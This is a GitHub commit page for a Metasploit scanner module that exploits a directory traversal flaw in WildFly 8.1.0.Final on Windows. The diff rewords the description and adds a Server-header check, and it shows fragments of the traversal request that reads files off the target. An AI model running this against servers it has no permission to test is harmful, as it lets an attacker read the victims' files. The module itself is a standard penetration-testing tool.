Skip to content

Commit e0cb0f7

Browse files
committed
Fix description
1 parent fa07b46 commit e0cb0f7

File tree

1 file changed

+8
-4
lines changed

1 file changed

+8
-4
lines changed

modules/auxiliary/scanner/http/wildfly_traversal.rb

Lines changed: 8 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -13,10 +13,11 @@ class Metasploit3 < Msf::Auxiliary
1313

1414
def initialize(info = {})
1515
super(update_info(info,
16-
'Name' => 'WildFly 8 (JBossAS) Directory Traversal',
16+
'Name' => 'WildFly 8 Directory Traversal',
1717
'Description' => %q{
18-
This module exploits a directory traversal vulnerability found in WildFly
19-
8.1.0.Final webserver on port 8080.
18+
This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final
19+
web server running on port 8080, named JBoss Undertow. The vulnerability only affects to
20+
Windows systems.
2021
},
2122
'References' =>
2223
[
@@ -47,7 +48,10 @@ def run_host(ip)
4748
'uri' => "/#{traversal}\\#{datastore['RELATIVE_FILE_PATH']}"
4849
})
4950

50-
if res && res.code == 200
51+
if res &&
52+
res.code == 200 &&
53+
res.headers['Server'] &&
54+
res.headers['Server'] =~ /WildFly/
5155
vprint_line(res.to_s)
5256
fname = File.basename(datastore['RELATIVE_FILE_PATH'])
5357

0 commit comments

Comments
 (0)